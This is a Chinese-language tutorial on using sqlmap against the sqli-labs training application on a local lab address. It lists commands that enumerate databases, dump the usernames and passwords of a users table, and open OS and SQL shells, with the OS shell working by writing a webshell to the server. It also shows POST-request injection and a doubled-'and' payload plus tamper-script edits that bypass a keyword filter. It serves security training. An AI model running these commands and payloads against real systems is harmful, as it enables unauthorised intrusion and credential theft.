渗透测试之Sqllib基础（三）sqlmap的使用

1.   sqlmap

sqlmap启动连接到目标后 直接先测试目标连接性

之后紧接着测试waf 并进行识别 如果有相应的waf规则 会进行提示

2.   sqlmap get的使用过程

#获取数据库名称
sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' --dbs --flush-session

 

 

#获取security数据库下的表名称
sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' -D security --tables

 

 

#查询user表下的列名称
sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' -D security -T users --columns

 

 

#查询user表中的username和password数据
sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' -D security -T users -C username,password --dump

 

 

3.   sqlmap的使用参数

sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' --dbs --flush-session --random-agent -v 3 --level 3 --risk 3 --delay=0.5

 

 

--dbs            列出当前数据库中的所有数据库
--flush-session  不使用上次跑过相同网站的缓存文件 重新开始
--random-agent   随机选取user-agent头部去发送
-v               显示sqlmap跑的信息  比如 -v3  显示发送的payload 
--level          去根据不同的注入点的位置 例如 cookie位置 例如user-agent位置来进行测试
--risk           发送更多的攻击代码 
--delay          延迟发送  
--force-ssl      如果目标是https的网站 加上此参数 
--os-shell       原理 就是利用mysql写文件的方式 给服务器上写一个sqlmap版本的马文件 并直接进行连接操作
--sql-shell      相当于直接连接到数据库下 执行sql语句在本地 
--refere         进行referer的伪造 若要对referer参数进行注入 --level 值大于等于三
--cookie         跑登录之后的链接地址 使用 

sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' --os-shell

 

 

 

sqlmap -u 'http://192.168.20.145/sqlilabs/Less-1/?id=1' --sql-shell

 

 

--cookie参数 跑登录之后的链接地址 使用 

 

 

 

4.   sqlmap post的处理

  1.直接把发送包使用burp截断，之后保存该包 使用sqlmap -r test.txt --dbs

 

  burp抓包到数据 复制另存为一个txt文件

 

 

  使用sqlmap -r参数

 

  2.使用--data参数

sqlmap -u 'http://192.168.20.145/sqlilabs/Less-11/index.php' --data "uname=admin&passwd=admin&submit=Submit" --dbs

 

  3.--tamper脚本 处理payload

  sqllib-20

 

 

 

  sqllib-21

 

 

  sqllib-25

  25关只爆出一个security的数据库 因为查询语句必须要有and coulmns * from 表名 and 库名

 

 

  发现只有security的数据库

  先手工测试过滤的字符 发现过滤了and 可以使用双写绕过

 

  http://192.168.20.145/sqlilabs/Less-25/index.php/?id=1%27%20anandd%201=1--+

   

  尝试修改tamper脚本    /usr/share/sqlmap/tamper/xx.py

  AND  替换成 anandd  发送的payload是大写AND

 

 

  或者是和burp的联动处理

  Fuzz技术